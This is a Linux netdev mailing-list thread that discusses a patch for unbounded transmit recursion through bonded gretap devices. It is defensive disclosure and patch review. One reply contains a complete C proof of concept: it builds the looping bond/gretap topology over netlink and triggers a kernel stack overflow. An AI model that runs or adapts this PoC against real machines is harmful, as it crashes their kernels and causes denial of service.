public inbox for netdev@vger.kernel.org
 help / color / mirror / Atom feed
* [PATCH net] net/core: add xmit recursion limit to qdisc transmit path
@ 2026-03-03  2:29 bestswngs
  2026-03-03  4:30 ` Eric Dumazet
  0 siblings, 1 reply; 5+ messages in thread
From: bestswngs @ 2026-03-03  2:29 UTC (permalink / raw)
  To: security
  Cc: edumazet, davem, kuba, pabeni, horms, netdev, linux-kernel, xmei5,
	Weiming Shi

From: Weiming Shi <bestswngs@gmail.com>

__dev_queue_xmit() has two transmit code paths depending on whether the
device has a qdisc attached:

  1. Qdisc path (q->enqueue): calls __dev_xmit_skb()
  2. No-qdisc path: calls dev_hard_start_xmit() directly

Commit 745e20f1b626 ("net: add a recursion limit in xmit path") added
recursion protection to the no-qdisc path via dev_xmit_recursion()
check and dev_xmit_recursion_inc()/dec() tracking. However, the qdisc
path performs no recursion depth checking at all.

This allows unbounded recursion through qdisc-attached devices. For
example, a bond interface in broadcast mode with gretap slaves whose
remote endpoints route back through the bond creates an infinite
transmit loop that exhausts the kernel stack:

  BUG: KASAN: stack-out-of-bounds in blake2s.constprop.0+0xe7/0x160
  Write of size 32 at addr ffff88810033fed0 by task kworker/0:1/11
  Workqueue: mld mld_ifc_work
  Call Trace:
   <TASK>
   __build_flow_key.constprop.0 (net/ipv4/route.c:515)
   ip_rt_update_pmtu (net/ipv4/route.c:1073)
   iptunnel_xmit (net/ipv4/ip_tunnel_core.c:84)
   ip_tunnel_xmit (net/ipv4/ip_tunnel.c:847)
   gre_tap_xmit (net/ipv4/ip_gre.c:779)
   dev_hard_start_xmit (net/core/dev.c:3887)
   sch_direct_xmit (net/sched/sch_generic.c:347)
   __dev_queue_xmit (net/core/dev.c:4802)
   bond_dev_queue_xmit (drivers/net/bonding/bond_main.c:312)
   bond_xmit_broadcast (drivers/net/bonding/bond_main.c:5279)
   bond_start_xmit (drivers/net/bonding/bond_main.c:5530)
   dev_hard_start_xmit (net/core/dev.c:3887)
   __dev_queue_xmit (net/core/dev.c:4841)
   ip_finish_output2 (net/ipv4/ip_output.c:237)
   ip_output (net/ipv4/ip_output.c:438)
   iptunnel_xmit (net/ipv4/ip_tunnel_core.c:86)
   gre_tap_xmit (net/ipv4/ip_gre.c:779)
   dev_hard_start_xmit (net/core/dev.c:3887)
   sch_direct_xmit (net/sched/sch_generic.c:347)
   __dev_queue_xmit (net/core/dev.c:4802)
   bond_dev_queue_xmit (drivers/net/bonding/bond_main.c:312)
   bond_xmit_broadcast (drivers/net/bonding/bond_main.c:5279)
   bond_start_xmit (drivers/net/bonding/bond_main.c:5530)
   dev_hard_start_xmit (net/core/dev.c:3887)
   __dev_queue_xmit (net/core/dev.c:4841)
   ip_finish_output2 (net/ipv4/ip_output.c:237)
   ip_output (net/ipv4/ip_output.c:438)
   iptunnel_xmit (net/ipv4/ip_tunnel_core.c:86)
   ip_tunnel_xmit (net/ipv4/ip_tunnel.c:847)
   gre_tap_xmit (net/ipv4/ip_gre.c:779)
   dev_hard_start_xmit (net/core/dev.c:3887)
   sch_direct_xmit (net/sched/sch_generic.c:347)
   __dev_queue_xmit (net/core/dev.c:4802)
   bond_dev_queue_xmit (drivers/net/bonding/bond_main.c:312)
   bond_xmit_broadcast (drivers/net/bonding/bond_main.c:5279)
   bond_start_xmit (drivers/net/bonding/bond_main.c:5530)
   dev_hard_start_xmit (net/core/dev.c:3887)
   __dev_queue_xmit (net/core/dev.c:4841)
   mld_sendpack
   mld_ifc_work
   process_one_work
   worker_thread
   </TASK>

  poc (76) used greatest stack depth: 8 bytes left
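For reference, an equivalent looping topology can be sketched with iproute2
(untested configuration sketch; device names, addresses, and the number of
slaves are illustrative, requires root):

```shell
# Broadcast-mode bond whose gretap slaves have remote endpoints that
# route back through the bond itself, closing the transmit loop.
ip link add bond0 type bond mode broadcast
ip addr add 10.1.1.1/24 dev bond0
ip link set bond0 up

for i in 1 2 3 4; do
    # remote 10.1.1.$((i + 1)) is reachable only via bond0
    ip link add gretap$i numtxqueues 9 type gretap remote 10.1.1.$((i + 1))
    # static neighbour entry so packets transmit without ARP resolution
    ip neigh replace 10.1.1.$((i + 1)) lladdr 00:11:22:33:44:5$i dev bond0
    ip link set gretap$i master bond0
    ip link set gretap$i up
done

# Any multicast traffic through bond0 (IGMP/MLD, IPv6 DAD) now recurses:
# bond0 -> gretap$i -> route lookup -> bond0 -> ...
```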

The per-queue qdisc_run_begin() serialization does not prevent this
because each gretap slave can have multiple TX queues, so each
recursion level may select a different queue. The q->owner check also
fails because each level operates on a different qdisc instance.

Fix by adding the same recursion protection to the qdisc path that
the no-qdisc path already has: check dev_xmit_recursion() before
entering __dev_xmit_skb(), and bracket the call with
dev_xmit_recursion_inc()/dec() to properly track nesting depth
across both transmit paths.

Fixes: bbd8a0d3a3b6 ("net: Avoid enqueuing skb for default qdiscs")
Reported-by: Xiang Mei <xmei5@asu.edu>
Signed-off-by: Weiming Shi <bestswngs@gmail.com>
---
 net/core/dev.c | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/net/core/dev.c b/net/core/dev.c
index c1a9f7fdcffa..d5d929df67be 100644
--- a/net/core/dev.c
+++ b/net/core/dev.c
@@ -4799,7 +4799,17 @@ int __dev_queue_xmit(struct sk_buff *skb, struct net_device *sb_dev)
 
 	trace_net_dev_queue(skb);
 	if (q->enqueue) {
+		if (unlikely(dev_xmit_recursion())) {
+			net_crit_ratelimited("Dead loop on virtual device %s, fix it urgently!\n",
+					     dev->name);
+			rc = -ENETDOWN;
+			dev_core_stats_tx_dropped_inc(dev);
+			kfree_skb_list(skb);
+			goto out;
+		}
+		dev_xmit_recursion_inc();
 		rc = __dev_xmit_skb(skb, q, dev, txq);
+		dev_xmit_recursion_dec();
 		goto out;
 	}
 
-- 
2.43.0


^ permalink raw reply related	[flat|nested] 5+ messages in thread

* Re: [PATCH net] net/core: add xmit recursion limit to qdisc transmit path
  2026-03-03  2:29 [PATCH net] net/core: add xmit recursion limit to qdisc transmit path bestswngs
@ 2026-03-03  4:30 ` Eric Dumazet
  2026-03-03  5:06   ` Xiang Mei
  2026-03-03  9:43   ` Weiming Shi
  0 siblings, 2 replies; 5+ messages in thread
From: Eric Dumazet @ 2026-03-03  4:30 UTC (permalink / raw)
  To: bestswngs
  Cc: security, davem, kuba, pabeni, horms, netdev, linux-kernel, xmei5

On Tue, Mar 3, 2026 at 3:37 AM <bestswngs@gmail.com> wrote:
>
> From: Weiming Shi <bestswngs@gmail.com>
>
> __dev_queue_xmit() has two transmit code paths depending on whether the
> device has a qdisc attached:
>
>   1. Qdisc path (q->enqueue): calls __dev_xmit_skb()
>   2. No-qdisc path: calls dev_hard_start_xmit() directly
>
> Commit 745e20f1b626 ("net: add a recursion limit in xmit path") added
> recursion protection to the no-qdisc path via dev_xmit_recursion()
> check and dev_xmit_recursion_inc()/dec() tracking. However, the qdisc
> path performs no recursion depth checking at all.
>
> This allows unbounded recursion through qdisc-attached devices. For
> example, a bond interface in broadcast mode with gretap slaves whose
> remote endpoints route back through the bond creates an infinite
> transmit loop that exhausts the kernel stack:

Non-LLTX drivers would deadlock in HARD_TX_LOCK().

I would prefer we try to fix this issue at configuration time instead
of adding yet another expensive operation in the fast path.

Can you provide a test ?

Thanks.

^ permalink raw reply	[flat|nested] 5+ messages in thread

* Re: [PATCH net] net/core: add xmit recursion limit to qdisc transmit path
  2026-03-03  4:30 ` Eric Dumazet
@ 2026-03-03  5:06   ` Xiang Mei
  2026-03-03  9:43   ` Weiming Shi
  1 sibling, 0 replies; 5+ messages in thread
From: Xiang Mei @ 2026-03-03  5:06 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: bestswngs, security, davem, kuba, pabeni, horms, netdev,
	linux-kernel

On Tue, Mar 03, 2026 at 05:30:11AM +0100, Eric Dumazet wrote:
> On Tue, Mar 3, 2026 at 3:37 AM <bestswngs@gmail.com> wrote:
> >
> > From: Weiming Shi <bestswngs@gmail.com>
> >
> > __dev_queue_xmit() has two transmit code paths depending on whether the
> > device has a qdisc attached:
> >
> >   1. Qdisc path (q->enqueue): calls __dev_xmit_skb()
> >   2. No-qdisc path: calls dev_hard_start_xmit() directly
> >
> > Commit 745e20f1b626 ("net: add a recursion limit in xmit path") added
> > recursion protection to the no-qdisc path via dev_xmit_recursion()
> > check and dev_xmit_recursion_inc()/dec() tracking. However, the qdisc
> > path performs no recursion depth checking at all.
> >
> > This allows unbounded recursion through qdisc-attached devices. For
> > example, a bond interface in broadcast mode with gretap slaves whose
> > remote endpoints route back through the bond creates an infinite
> > transmit loop that exhausts the kernel stack:
> 
> Non-LLTX drivers would deadlock in HARD_TX_LOCK().
> 
> I would prefer we try to fix this issue at configuration time instead
> of adding yet another expensive operation in the fast path.
>
Thanks for the review and advice.
Weiming will discuss the patch in more detail when he gets back to his
computer.

> Can you provide a test ?

Here is a PoC. It may trigger other crashes because of the uncontrolled
stack growth; the expected crash is
"BUG: KASAN: stack-out-of-bounds in __unwind_start+0x2f/0x7a0".

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/if_link.h>
#include <linux/if_tunnel.h>
#include <linux/ip.h>
#include <linux/neighbour.h>
#include <arpa/inet.h>
#include <sched.h>

#include <stdint.h>

/* declared directly to avoid mixing <net/if.h> with the
 * <linux/if_*.h> uapi headers included above */
extern unsigned int if_nametoindex(const char *ifname);

#ifndef IFF_UP
#define IFF_UP 0x1
#endif

struct nlmsg {
    char *pos;
    int nesting;
    struct nlattr *nested[8];
    char buf[8192];
};

static void nl_init(struct nlmsg *nlmsg, int typ, int flags,
                    const void *data, int size)
{
    memset(nlmsg, 0, sizeof(*nlmsg));
    struct nlmsghdr *hdr = (struct nlmsghdr *)nlmsg->buf;
    hdr->nlmsg_type = typ;
    hdr->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | flags;
    memcpy(hdr + 1, data, size);
    nlmsg->pos = (char *)(hdr + 1) + NLMSG_ALIGN(size);
}

static void nl_attr(struct nlmsg *nlmsg, int typ, const void *data, int size)
{
    struct nlattr *attr = (struct nlattr *)nlmsg->pos;
    attr->nla_len = sizeof(*attr) + size;
    attr->nla_type = typ;
    if (size > 0)
        memcpy(attr + 1, data, size);
    nlmsg->pos += NLMSG_ALIGN(attr->nla_len);
}

static void nl_nest(struct nlmsg *nlmsg, int typ)
{
    struct nlattr *attr = (struct nlattr *)nlmsg->pos;
    attr->nla_type = typ;
    nlmsg->pos += sizeof(*attr);
    nlmsg->nested[nlmsg->nesting++] = attr;
}

static void nl_done(struct nlmsg *nlmsg)
{
    struct nlattr *attr = nlmsg->nested[--nlmsg->nesting];
    attr->nla_len = nlmsg->pos - (char *)attr;
}

static int nl_send(struct nlmsg *nlmsg, int sock)
{
    struct nlmsghdr *hdr = (struct nlmsghdr *)nlmsg->buf;
    hdr->nlmsg_len = nlmsg->pos - nlmsg->buf;

    struct sockaddr_nl addr = { .nl_family = AF_NETLINK };
    ssize_t n = sendto(sock, nlmsg->buf, hdr->nlmsg_len, 0,
                       (struct sockaddr *)&addr, sizeof(addr));
    if (n != (ssize_t)hdr->nlmsg_len)
        return -1;

    n = recv(sock, nlmsg->buf, sizeof(nlmsg->buf), 0);
    if (n < 0)
        return -1;
    if (n < (ssize_t)(sizeof(struct nlmsghdr) + sizeof(struct nlmsgerr)))
        return -1;

    hdr = (struct nlmsghdr *)nlmsg->buf;
    if (hdr->nlmsg_type == NLMSG_ERROR) {
        int err = -((struct nlmsgerr *)(hdr + 1))->error;
        if (err) {
            errno = err;
            return -err;
        }
    }
    return 0;
}

static int create_device(int sock, struct nlmsg *nlmsg, const char *name,
                         const char *kind)
{
    struct ifinfomsg hdr = {};
    nl_init(nlmsg, RTM_NEWLINK, NLM_F_EXCL | NLM_F_CREATE, &hdr, sizeof(hdr));
    nl_attr(nlmsg, IFLA_IFNAME, name, strlen(name) + 1);
    nl_nest(nlmsg, IFLA_LINKINFO);
    nl_attr(nlmsg, IFLA_INFO_KIND, kind, strlen(kind));
    nl_done(nlmsg);
    int ret = nl_send(nlmsg, sock);
    printf("  create %s (%s): %s\n", name, kind, ret ? strerror(errno) : "ok");
    return ret;
}

static int create_bond(int sock, struct nlmsg *nlmsg, const char *name, int mode)
{
    struct ifinfomsg hdr = {};
    nl_init(nlmsg, RTM_NEWLINK, NLM_F_EXCL | NLM_F_CREATE, &hdr, sizeof(hdr));
    nl_attr(nlmsg, IFLA_IFNAME, name, strlen(name) + 1);
    nl_nest(nlmsg, IFLA_LINKINFO);
    nl_attr(nlmsg, IFLA_INFO_KIND, "bond", 4);
    nl_nest(nlmsg, IFLA_INFO_DATA);
    uint8_t bond_mode = mode;
    nl_attr(nlmsg, IFLA_BOND_MODE, &bond_mode, sizeof(bond_mode));
    nl_done(nlmsg);
    nl_done(nlmsg);
    int ret = nl_send(nlmsg, sock);
    printf("  create bond %s (mode=%d): %s\n", name, mode, ret ? strerror(errno) : "ok");
    return ret;
}

static int create_gretap(int sock, struct nlmsg *nlmsg, const char *name,
                         uint32_t remote, int num_tx_queues)
{
    struct ifinfomsg hdr = {};
    nl_init(nlmsg, RTM_NEWLINK, NLM_F_EXCL | NLM_F_CREATE, &hdr, sizeof(hdr));
    nl_attr(nlmsg, IFLA_IFNAME, name, strlen(name) + 1);
    uint32_t ntxq = num_tx_queues;
    nl_attr(nlmsg, IFLA_NUM_TX_QUEUES, &ntxq, sizeof(ntxq));
    nl_nest(nlmsg, IFLA_LINKINFO);
    nl_attr(nlmsg, IFLA_INFO_KIND, "gretap", 6);
    nl_nest(nlmsg, IFLA_INFO_DATA);
    nl_attr(nlmsg, IFLA_GRE_REMOTE, &remote, sizeof(remote));
    nl_done(nlmsg);
    nl_done(nlmsg);
    int ret = nl_send(nlmsg, sock);
    printf("  create gretap %s (remote, %d txq): %s\n", name, num_tx_queues,
           ret ? strerror(errno) : "ok");
    return ret;
}

static int set_master(int sock, struct nlmsg *nlmsg, const char *slave,
                      const char *master)
{
    struct ifinfomsg hdr = {};
    hdr.ifi_index = if_nametoindex(slave);
    if (!hdr.ifi_index) return -1;
    nl_init(nlmsg, RTM_NEWLINK, 0, &hdr, sizeof(hdr));
    int master_idx = if_nametoindex(master);
    nl_attr(nlmsg, IFLA_MASTER, &master_idx, sizeof(master_idx));
    int ret = nl_send(nlmsg, sock);
    printf("  enslave %s -> %s: %s\n", slave, master, ret ? strerror(errno) : "ok");
    return ret;
}

static int dev_updown(int sock, struct nlmsg *nlmsg, const char *name, int up)
{
    struct ifinfomsg hdr = {};
    hdr.ifi_index = if_nametoindex(name);
    if (!hdr.ifi_index) return -1;
    hdr.ifi_flags = up ? IFF_UP : 0;
    hdr.ifi_change = IFF_UP;
    nl_init(nlmsg, RTM_NEWLINK, 0, &hdr, sizeof(hdr));
    int ret = nl_send(nlmsg, sock);
    printf("  %s %s: %s\n", up ? "up" : "down", name, ret ? strerror(errno) : "ok");
    return ret;
}

static int add_addr4(int sock, struct nlmsg *nlmsg, const char *dev,
                     const char *addr_str, int prefix)
{
    struct ifaddrmsg hdr = {};
    hdr.ifa_family = AF_INET;
    hdr.ifa_prefixlen = prefix;
    hdr.ifa_scope = RT_SCOPE_UNIVERSE;
    hdr.ifa_index = if_nametoindex(dev);
    struct in_addr addr;
    inet_pton(AF_INET, addr_str, &addr);
    nl_init(nlmsg, RTM_NEWADDR, NLM_F_CREATE | NLM_F_REPLACE, &hdr, sizeof(hdr));
    nl_attr(nlmsg, IFA_LOCAL, &addr, sizeof(addr));
    nl_attr(nlmsg, IFA_ADDRESS, &addr, sizeof(addr));
    int ret = nl_send(nlmsg, sock);
    printf("  addr %s %s/%d: %s\n", dev, addr_str, prefix, ret ? strerror(errno) : "ok");
    return ret;
}

static int add_addr6(int sock, struct nlmsg *nlmsg, const char *dev,
                     const char *addr_str, int prefix)
{
    struct ifaddrmsg hdr = {};
    hdr.ifa_family = AF_INET6;
    hdr.ifa_prefixlen = prefix;
    hdr.ifa_scope = RT_SCOPE_UNIVERSE;
    hdr.ifa_index = if_nametoindex(dev);
    struct in6_addr addr;
    inet_pton(AF_INET6, addr_str, &addr);
    nl_init(nlmsg, RTM_NEWADDR, NLM_F_CREATE | NLM_F_REPLACE, &hdr, sizeof(hdr));
    nl_attr(nlmsg, IFA_LOCAL, &addr, sizeof(addr));
    nl_attr(nlmsg, IFA_ADDRESS, &addr, sizeof(addr));
    int ret = nl_send(nlmsg, sock);
    printf("  addr6 %s %s/%d: %s\n", dev, addr_str, prefix, ret ? strerror(errno) : "ok");
    return ret;
}

static int create_veth(int sock, struct nlmsg *nlmsg, const char *name,
                       const char *peer)
{
    struct ifinfomsg hdr = {};
    nl_init(nlmsg, RTM_NEWLINK, NLM_F_EXCL | NLM_F_CREATE, &hdr, sizeof(hdr));
    nl_attr(nlmsg, IFLA_IFNAME, name, strlen(name) + 1);
    nl_nest(nlmsg, IFLA_LINKINFO);
    nl_attr(nlmsg, IFLA_INFO_KIND, "veth", 4);
    nl_nest(nlmsg, IFLA_INFO_DATA);
    nl_nest(nlmsg, 1 /* VETH_INFO_PEER */);
    nlmsg->pos += sizeof(struct ifinfomsg);
    nl_attr(nlmsg, IFLA_IFNAME, peer, strlen(peer) + 1);
    nl_done(nlmsg);
    nl_done(nlmsg);
    nl_done(nlmsg);
    int ret = nl_send(nlmsg, sock);
    printf("  create veth %s<->%s: %s\n", name, peer, ret ? strerror(errno) : "ok");
    return ret;
}

static int add_neigh4(int sock, struct nlmsg *nlmsg, const char *dev,
                      const char *addr_str, const unsigned char *mac)
{
    struct ndmsg hdr = {};
    hdr.ndm_family = AF_INET;
    hdr.ndm_ifindex = if_nametoindex(dev);
    hdr.ndm_state = NUD_PERMANENT;
    hdr.ndm_type = 0;
    nl_init(nlmsg, RTM_NEWNEIGH, NLM_F_CREATE | NLM_F_REPLACE, &hdr, sizeof(hdr));
    struct in_addr addr;
    inet_pton(AF_INET, addr_str, &addr);
    nl_attr(nlmsg, NDA_DST, &addr, sizeof(addr));
    nl_attr(nlmsg, NDA_LLADDR, mac, 6);
    int ret = nl_send(nlmsg, sock);
    printf("  neigh %s %s: %s\n", dev, addr_str, ret ? strerror(errno) : "ok");
    return ret;
}

// Debug: check if routing to dst works through devname
static void debug_route(const char *devname, const char *dst_str)
{
    int fd = socket(AF_INET, SOCK_DGRAM, 0);
    if (fd < 0) { perror("  debug: socket"); return; }

    if (setsockopt(fd, SOL_SOCKET, 25 /* SO_BINDTODEVICE */,
                   devname, strlen(devname) + 1) < 0) {
        printf("  debug: SO_BINDTODEVICE %s: %s\n", devname, strerror(errno));
    }

    struct sockaddr_in dst = {};
    dst.sin_family = AF_INET;
    dst.sin_port = htons(9999);
    inet_pton(AF_INET, dst_str, &dst.sin_addr);

    if (connect(fd, (struct sockaddr *)&dst, sizeof(dst)) < 0) {
        printf("  debug: connect to %s via %s: %s\n", dst_str, devname, strerror(errno));
    } else {
        struct sockaddr_in local = {};
        socklen_t len = sizeof(local);
        getsockname(fd, (struct sockaddr *)&local, &len);
        char local_str[32];
        inet_ntop(AF_INET, &local.sin_addr, local_str, sizeof(local_str));
        printf("  debug: route to %s via %s OK, local=%s\n", dst_str, devname, local_str);

        // Try to actually send a packet
        char buf[64] = "test";
        ssize_t n = send(fd, buf, sizeof(buf), MSG_DONTWAIT);
        printf("  debug: send: %zd (%s)\n", n, n < 0 ? strerror(errno) : "ok");
    }
    close(fd);
}

// Send a multicast packet through bond0 to actively trigger the recursive path
static void trigger_multicast(const char *devname)
{
    int fd = socket(AF_INET, SOCK_DGRAM, 0);
    if (fd < 0) {
        perror("  trigger: socket");
        return;
    }

    // Bind to device
    if (setsockopt(fd, SOL_SOCKET, 25 /* SO_BINDTODEVICE */,
                   devname, strlen(devname) + 1) < 0) {
        perror("  trigger: SO_BINDTODEVICE");
    }

    // Set multicast TTL
    int ttl = 1;
    setsockopt(fd, IPPROTO_IP, 33 /* IP_MULTICAST_TTL */, &ttl, sizeof(ttl));

    // Send to multicast address 224.0.0.1 (all-hosts)
    struct sockaddr_in dst = {};
    dst.sin_family = AF_INET;
    dst.sin_port = htons(9999);
    inet_pton(AF_INET, "224.0.0.1", &dst.sin_addr);

    char buf[64] = "trigger";
    for (int i = 0; i < 10; i++) {
        if (sendto(fd, buf, sizeof(buf), 0,
                   (struct sockaddr *)&dst, sizeof(dst)) < 0) {
            printf("  trigger: sendto #%d: %s\n", i, strerror(errno));
        } else {
            printf("  trigger: sent multicast #%d\n", i);
        }
        usleep(100000);
    }
    close(fd);
}

int main(int argc, char *argv[])
{
    printf("[*] PoC: KASAN stack-out-of-bounds via unbounded xmit recursion\n");
    printf("[*] uid=%d euid=%d\n", getuid(), geteuid());

    int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
    if (sock < 0) {
        perror("socket(NETLINK_ROUTE)");
        return 1;
    }

    struct nlmsg nlmsg;
    struct in_addr remote;
    inet_pton(AF_INET, "10.1.1.2", &remote);
    unsigned char fake_mac[6] = {0x00, 0x11, 0x22, 0x33, 0x44, 0x55};

    // Bring up loopback first
    printf("[*] Step 0: Bring up loopback...\n");
    dev_updown(sock, &nlmsg, "lo", 1);

    printf("[*] Step 1: Create bond0 in broadcast mode (mode 3)...\n");
    create_bond(sock, &nlmsg, "bond0", 3);

    printf("[*] Step 2: Bring bond0 UP and assign IPv4...\n");
    dev_updown(sock, &nlmsg, "bond0", 1);
    add_addr4(sock, &nlmsg, "bond0", "10.1.1.1", 24);

    // Create MULTIPLE gretap tunnels, each with a DIFFERENT remote address.
    // All remotes are in the 10.1.1.0/24 subnet (reachable through bond0).
    // With broadcast mode, bond sends to all slaves. Each gretap has its OWN
    // qdisc instances (pfifo_fast with TCQ_F_NOLOCK). When bond recurses:
    // - Level 0: gretap1's qdisc runs → tunnel → back to bond
    // - Level 1: gretap1 blocked (running), gretap2 runs → tunnel → bond
    // - Level 2: gretap1,2 blocked, gretap3 runs → tunnel → bond
    // - Level 3: gretap1,2,3 blocked, gretap4 runs → tunnel → bond
    // Each level adds ~8-12KB of stack (with KASAN_STACK). With 32KB stack
    // (KASAN doubles it), 4 levels = ~40-50KB → overflow!
    // Pre-populate ARP entries BEFORE enslaving gretap devices.
    // This ensures that when IGMP/NDP is triggered by enslaving, the
    // outer GRE packets can be sent immediately (no ARP resolution queue).
    printf("[*] Step 3: Pre-populate ARP entries for all remotes...\n");
    int num_gretaps = 7;
    char gname[16], remote_str[32];
    for (int i = 0; i < num_gretaps; i++) {
        snprintf(remote_str, sizeof(remote_str), "10.1.1.%d", i + 2);
        fake_mac[5] = 0x55 + i;
        add_neigh4(sock, &nlmsg, "bond0", remote_str, fake_mac);
    }

    printf("[*] Step 4: Create %d gretap tunnels (different remotes, 9 txq each)...\n",
           num_gretaps);
    for (int i = 0; i < num_gretaps; i++) {
        snprintf(gname, sizeof(gname), "gretap%d", i + 1);
        snprintf(remote_str, sizeof(remote_str), "10.1.1.%d", i + 2);
        inet_pton(AF_INET, remote_str, &remote);
        create_gretap(sock, &nlmsg, gname, remote.s_addr, 9);
    }

    printf("[*] Step 5: Enslave all gretaps to bond0 and bring up...\n");
    for (int i = 0; i < num_gretaps; i++) {
        snprintf(gname, sizeof(gname), "gretap%d", i + 1);
        set_master(sock, &nlmsg, gname, "bond0");
        dev_updown(sock, &nlmsg, gname, 1);
    }

    printf("[*] Step 6: Trigger - Add IPv6 address (triggers DAD through bond)...\n");
    // DAD sends NDP through all slaves → gretap → tunnel → bond → recursion
    add_addr6(sock, &nlmsg, "bond0", "fd00::1", 64);
    sleep(3);

    printf("[*] Step 7: Toggle bond0 to retrigger IGMP/MLD...\n");
    dev_updown(sock, &nlmsg, "bond0", 0);
    usleep(200000);
    dev_updown(sock, &nlmsg, "bond0", 1);
    add_neigh4(sock, &nlmsg, "bond0", "10.1.1.2", fake_mac);
    add_addr6(sock, &nlmsg, "bond0", "fd01::1", 64);
    sleep(3);

    printf("[*] Step 8: Send multicast packets through bond0...\n");
    trigger_multicast("bond0");

    printf("[*] Done. Check dmesg for KASAN report.\n");
    sleep(5);
    close(sock);
    return 0;
}
```

Please let me know if it doesn't trigger the bug.

Thanks,
Xiang
> 
> Thanks.

^ permalink raw reply	[flat|nested] 5+ messages in thread

* Re: [PATCH net] net/core: add xmit recursion limit to qdisc transmit path
  2026-03-03  4:30 ` Eric Dumazet
  2026-03-03  5:06   ` Xiang Mei
@ 2026-03-03  9:43   ` Weiming Shi
  2026-03-03 10:05     ` Eric Dumazet
  1 sibling, 1 reply; 5+ messages in thread
From: Weiming Shi @ 2026-03-03  9:43 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: security, davem, kuba, pabeni, horms, netdev, linux-kernel, xmei5

On 26-03-03 05:30, Eric Dumazet wrote:
> On Tue, Mar 3, 2026 at 3:37 AM <bestswngs@gmail.com> wrote:
> >
> > From: Weiming Shi <bestswngs@gmail.com>
> >
> > __dev_queue_xmit() has two transmit code paths depending on whether the
> > device has a qdisc attached:
> >
> >   1. Qdisc path (q->enqueue): calls __dev_xmit_skb()
> >   2. No-qdisc path: calls dev_hard_start_xmit() directly
> >
> > Commit 745e20f1b626 ("net: add a recursion limit in xmit path") added
> > recursion protection to the no-qdisc path via dev_xmit_recursion()
> > check and dev_xmit_recursion_inc()/dec() tracking. However, the qdisc
> > path performs no recursion depth checking at all.
> >
> > This allows unbounded recursion through qdisc-attached devices. For
> > example, a bond interface in broadcast mode with gretap slaves whose
> > remote endpoints route back through the bond creates an infinite
> > transmit loop that exhausts the kernel stack:
> 
> Non-LLTX drivers would deadlock in HARD_TX_LOCK().
> 
> I would prefer we try to fix this issue at configuration time instead
> of adding yet another expensive operation in the fast path.
> 
> Can you provide a test ?
> 
> Thanks.

Thanks for the review. I have two follow-up questions:

1. For the configuration-time approach: the loop in this case is
 formed through the routing layer (gretap remote endpoint routes
 back through the bond), not through direct upper/lower device
 links. Since routes can change dynamically after enslave, would
 this require adding checks in all of bond_enslave(), route change,
 and address change paths to be complete? I want to make sure I
 understand the scope before going down that path.

2. As an alternative, would it be acceptable to move the recursion
 check into the bonding driver itself (e.g., bond_start_xmit() or
 bond_xmit_broadcast())? This would avoid touching the generic fast
 path entirely, and since bond is LLTX, there is no HARD_TX_LOCK()
 deadlock concern. It would narrowly target the driver that causes
 the fan-out recursion.

Happy to respin in either direction, or explore other approaches
 you have in mind.

^ permalink raw reply	[flat|nested] 5+ messages in thread

* Re: [PATCH net] net/core: add xmit recursion limit to qdisc transmit path
  2026-03-03  9:43   ` Weiming Shi
@ 2026-03-03 10:05     ` Eric Dumazet
  0 siblings, 0 replies; 5+ messages in thread
From: Eric Dumazet @ 2026-03-03 10:05 UTC (permalink / raw)
  To: Weiming Shi
  Cc: security, davem, kuba, pabeni, horms, netdev, linux-kernel, xmei5

On Tue, Mar 3, 2026 at 10:43 AM Weiming Shi <bestswngs@gmail.com> wrote:
>
> On 26-03-03 05:30, Eric Dumazet wrote:
> > On Tue, Mar 3, 2026 at 3:37 AM <bestswngs@gmail.com> wrote:
> > >
> > > From: Weiming Shi <bestswngs@gmail.com>
> > >
> > > __dev_queue_xmit() has two transmit code paths depending on whether the
> > > device has a qdisc attached:
> > >
> > >   1. Qdisc path (q->enqueue): calls __dev_xmit_skb()
> > >   2. No-qdisc path: calls dev_hard_start_xmit() directly
> > >
> > > Commit 745e20f1b626 ("net: add a recursion limit in xmit path") added
> > > recursion protection to the no-qdisc path via dev_xmit_recursion()
> > > check and dev_xmit_recursion_inc()/dec() tracking. However, the qdisc
> > > path performs no recursion depth checking at all.
> > >
> > > This allows unbounded recursion through qdisc-attached devices. For
> > > example, a bond interface in broadcast mode with gretap slaves whose
> > > remote endpoints route back through the bond creates an infinite
> > > transmit loop that exhausts the kernel stack:
> >
> > Non-LLTX drivers would deadlock in HARD_TX_LOCK().
> >
> > I would prefer we try to fix this issue at configuration time instead
> > of adding yet another expensive operation in the fast path.
> >
> > Can you provide a test ?
> >
> > Thanks.
>
> Thanks for the review. I have two follow-up questions:
>
> 1. For the configuration-time approach: the loop in this case is
>  formed through the routing layer (gretap remote endpoint routes
>  back through the bond), not through direct upper/lower device
>  links. Since routes can change dynamically after enslave, would
>  this require adding checks in all of bond_enslave(), route change,
>  and address change paths to be complete? I want to make sure I
>  understand the scope before going down that path.
>
> 2. As an alternative, would it be acceptable to move the recursion
>  check into the bonding driver itself (e.g., bond_start_xmit() or
>  bond_xmit_broadcast())? This would avoid touching the generic fast
>  path entirely, and since bond is LLTX, there is no HARD_TX_LOCK()
>  deadlock concern. It would narrowly target the driver that causes
>  the fan-out recursion.
>
> Happy to respin in either direction, or explore other approaches
>  you have in mind.

I would add the recursion check in tunnel drivers that do a route lookup,
since the packet can be sent to an arbitrary device tree.

bonding in itself is fine; we already limit the nesting depth:

include/linux/netdevice.h:99:#define MAX_NEST_DEV 8

^ permalink raw reply	[flat|nested] 5+ messages in thread

end of thread, other threads:[~2026-03-03 10:06 UTC | newest]

Thread overview: 5+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2026-03-03  2:29 [PATCH net] net/core: add xmit recursion limit to qdisc transmit path bestswngs
2026-03-03  4:30 ` Eric Dumazet
2026-03-03  5:06   ` Xiang Mei
2026-03-03  9:43   ` Weiming Shi
2026-03-03 10:05     ` Eric Dumazet

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox